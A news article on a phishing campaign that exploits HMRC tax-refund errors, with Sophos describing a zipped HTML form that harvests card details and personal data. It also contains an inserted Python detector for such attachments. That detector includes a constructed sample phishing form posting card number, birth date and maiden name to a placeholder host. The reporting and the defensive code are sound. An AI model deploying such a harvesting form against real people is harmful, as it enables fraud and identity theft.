Security firm issues warning about spam campaign that exploits HMRC tax error refund
Phishers have been quick to seize the initiative in a week in which it was revealed that up to 6 million people will be written to about issues with their tax.
As has been widely reported in the news, tax authorities are writing to millions of people in the UK to inform them that they have been paying the wrong amount of tax. For some it will mean a rebate, while for others it could mean that they will be forced to cough up for unpaid tax following errors made at HMRC.
IT security firm Sophos is already seeing emails that claim to have come from HMRC, often with the line 'You have an HMRC Refund' while informing the recipient that they have supposedly made overpayments.
The email goes on to say that an attached form must be completed before a refund can be processed. Attached to the email is a file called 'Refund-Form.zip' containing an HTML file called 'Refund-Form.htm', which asks for information including credit card details, full date of birth and mother's maiden name.
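For mail filtering, the attachment pattern described above can be checked mechanically. The following is an added example, not code from Sophos or from the original article: it opens a zip attachment, parses any HTML file inside and flags forms that submit sensitive-looking fields to a remote host. The field-name hints, the sample form and the host `collector.example.invalid` are assumptions constructed for illustration.

```python
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name hints for the data the article says the form asked for (assumed list).
SENSITIVE_HINTS = ("card", "cvv", "dob", "birth", "maiden")

class FormAudit(HTMLParser):
    """Collects form targets and input names from one HTML document."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag in ("input", "select", "textarea"):
            self.fields.append((a.get("name") or a.get("id") or "").lower())

def audit_zip_attachment(data: bytes):
    """Return findings for HTML files in a zip that post sensitive fields off-host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".htm", ".html")):
                continue
            p = FormAudit()
            p.feed(zf.read(name).decode("utf-8", errors="replace"))
            # A form action with a hostname sends the data to a remote server.
            remote = sorted({urlparse(x).hostname for x in p.actions if urlparse(x).hostname})
            hits = sorted({f for f in p.fields if any(h in f for h in SENSITIVE_HINTS)})
            if remote and hits:
                findings.append({"file": name, "posts_to": remote, "sensitive_fields": hits})
    return findings

def build_sample() -> bytes:
    """Constructed sample: file name from the article, form body and host invented."""
    html = ('<form method="post" action="http://collector.example.invalid/save.php">'
            '<input name="card_number"><input name="date_of_birth">'
            '<input name="mother_maiden_name"><input name="full_name"></form>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Refund-Form.htm", html)
    return buf.getvalue()

if __name__ == "__main__":
    for finding in audit_zip_attachment(build_sample()):
        print(finding)
```

A form with a relative or empty `action` is not flagged, since it does not name a remote host; matching on field names is a heuristic and will miss forms that use opaque names.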
"If you do make the mistake of filling in the form, your confidential data is uploaded to a Chinese server. You're not going to receive a windfall because of this form - you've just been phished," said Graham Cluley, senior technology consultant at Sophos.
"The real HMRC website contains advice about scams like this, and clearly states that they would never inform customers of a tax rebate via email, or invite them to complete an online form to receive a rebate of tax. You have been warned - don't let your eagerness for a tax refund lead you to throw caution to the wind."











